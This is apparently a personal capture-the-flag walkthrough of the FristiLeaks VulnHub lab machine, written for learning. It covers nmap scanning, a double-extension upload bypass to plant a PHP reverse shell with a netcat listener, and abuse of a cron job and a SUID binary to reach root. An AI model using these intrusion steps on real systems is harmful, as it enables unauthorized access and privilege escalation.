The machine can be downloaded here:
https://www.vulnhub.com/entry/fristileaks-13,133/
Thanks to the guy who built it: Ar0xA
It’s a beginner level Vulnerable machine which was part of some dutch hacking con, and is meant to be solved under 4 hours.
Without further due, let’s delve into it:
Step 1: Lets’ use netdiscover with the following command to find the host
netdiscover -i eth0 -r 192.168.178.0/24
Unfortunately this did not work out as, can be seen here:
Step 2: Let’s use nmap, to scan the machine
While booting up the virtual machine, the machine’s IP Adress is visible, which is why I do not consider finding the IP part of the game:
nmap -A -vv -T5 -oN fristileaks 192.168.178.53
# Nmap 7.60 scan initiated Tue Jan 9 21:37:17 2018 as: nmap -A -vv -T5 -oN fristileaks 192.168.178.53
Nmap scan report for 192.168.178.53
Host is up, received arp-response (0.00042s latency).
Scanned at 2018-01-09 21:37:17 GMT for 12s
Not shown: 999 filtered ports
Reason: 990 no-responses and 9 host-prohibited
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
TCP/IP fingerprint:
Uptime guess: 0.011 days (since Tue Jan 9 21:21:55 2018)
So what does this tell us?
There is only port 80 opened on the machine.
There’s an Apache 2.2.15 running on CentOS bundled together with DAV/2 and PHP/5.3.3
The robots.txt reads like this:
User-agent: *
Disallow: /cola
Disallow: /sisi
Disallow: /beer
Those might be interesting links to follow. Let’s see…
Step 3: Visit the webpage, check disallowed pages and sourcecode for hints
Ok, so Fristi is some sort of mixed milkdrink from the netherlands. Honestly I should have looked this up first, otherwise I wouldn’t have been stuck so long on this hint. In my defense, it’s usually quite late when I get to work on my vulnerable machines and after a long day’s work and some time in the gym I might lack some basic creativity.
So all the links (named after drinks, obviously beer and cola, sisi is some dutch speciality, too) mentioned in the robots.txt lead to a page that only contains of the following picture:
Yea, the source code on all three pages reveals nothing, too. I think I will just not mention the hour I spent using dirb trying to find other directories of interest.
Also I won’t mention the time I spent using strings, exif and foremost looking to pull any more info from the pictures the webpage gave me.
Even the /colasisibeer directory did not exist.
So if you do not find the obvious you need to look for the obscure. At least that’s what I though at that moment.
So of course the next step was:
Step 4: Looking for exploits with searchsploit
As described above I was quite desperate at that moment, so I found myself two exploits which might fit the bill:
searchsploit Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass | exploits/linux/remote/36663.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | exploits/linux/webapps/42745.py
After spending another 20 minutes trying to understand what they do, I figured this is a beginner VM after all and this is surely not the intended part to take. Also since I did not want to spent more time on this, I did not shoot the exploits without understanding what they do. Think that’s a good rule to hold on to.
Step 5: Help me internet, dammit
So, after all this exploring in the wrong direction I consulted the unending wisdom of the internetz for some help on my lack of creativity here.
The answer was so simple… I swear I will do my basic research up front from now on:
http://192.168.178.53/fristi/
So this is where the admin portal login hid. The picture says it all:
Step 6: Back on track, checking the page source for hints
So after quickly checking for sql injection errors (kinda pointless), I did check the source code, which indeed does look more promising:
1) There is this comment, which contains the username possible eezeepz:
!-- TODO: We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz --
2) Also the source code contains two base64 encoded parts. The second part is commented out.
The note above refering to it as junk, so let’s decode it (with encode2 being the part :
cat encode2 | base64 --decode > out.png
The out.png looks like this:
So we got a possible username and this weird string keKkeKKeKKeKkEkkEk saved in a picture. Might as well be the credentials we need. After all this needs to be done in less than four hours.
Step 7: The login does work, we got an upload page
So with the login successful, we are able to upload pics now, possibly also a shell in php, too. So I quickly prepared pentestmonkey’s php shell (http://pentestmonkey.net/tools/web-shells/php-reverse-shell ) and created a netcat listener on my machine:
netcat -vvl -p 8000
So I cannot upload php files directly, the files needs to be a .png, a .jpg or a.gif file. So I change the shell’s name to shell.php.png and here we go:
Step 8: We got shell now! Let’s explore.
By opening http://192.168.178.53/fristi/uploads/shell.php we will get a reverse shell on our on listener:
By default I always try this to update the shell to a tty shell, so it’s more easy to use:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
cd /tmp
python asdf.py
After navigating the filesystem a bit I find a note in /var/www/cgi-bin :
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
Following up on this, I found another notes file in /home/eezeepz
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
Intrigued. So, chmod is available with the admin user’s privileges? Let’s make the the /home/admin folder accesible to everyone.
cd /tmp
echo "/home/admin/chmod -R 777 /home/admin/" > runthis
Step 9: Let’s browse the admin directory.
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
Interesting… let’s see.
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
Ok, so what’s cryptpass.py ?
cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
So, let’s built a little python script, that does the above’s script encoding in reverse. Easy, let’s build the script and decode the whoisyourgodnow.txt on my machine:
import base64,codecs,sys
def decodeString(str):
reverse = (str[::-1])
rot13string = codecs.decode(reverse, 'rot13')
return base64.b64decode(rot13string)
cryptoResult = decodeString(sys.argv[1])
print cryptoResult
Great success, the password looks to be LetThereBeFristi!
Let’s try it!
Step 10: Let’s login as fristigod.
Let’s do this. Why fristigod? Because, besides the eezeepz and the admin dir, there is a fristigod dir in the /home directory.
su - fristigod
As soon as we are fristigod I found this:
cd /var/fristigod/.secret_admin_stuff
There is a SUID executable called doCom with the following permissions:
-rwsr-sr-x 1 root root 7.4K Nov 25 2015 doCom
I checked the file with strings:
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setuid
exit
strcat
stderr
system
getuid
fwrite
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
Nice try, but wrong user ;)
Usage: ./program_name terminal_command ...
I tried to execute this, but it did not let me:
sudo ./doCom
[sudo] password for fristigod: LetThereBeFristi!
Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain.
Step 11: Following the lead in the .bash_history file
In the home directory of fristigod I found a bash history file:
cat .bash_history
This looks promising:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Let’s just try this then:
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# whoami
whoami
root
Boom, root! Let’s wrap this up:
cd /root
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
Done!
Despite the first lack of research into what Fristi is, I think I managed to pull this off in about 4 hours. Still, there is a feeling that I cheated on this. Hopefully the next Vulnhub VM will be all my work.
Again, thanks to the Author of Fristileaks and also a shout out to the Vulnhub.com page, which does a great job hosting all those machines.
Cheers.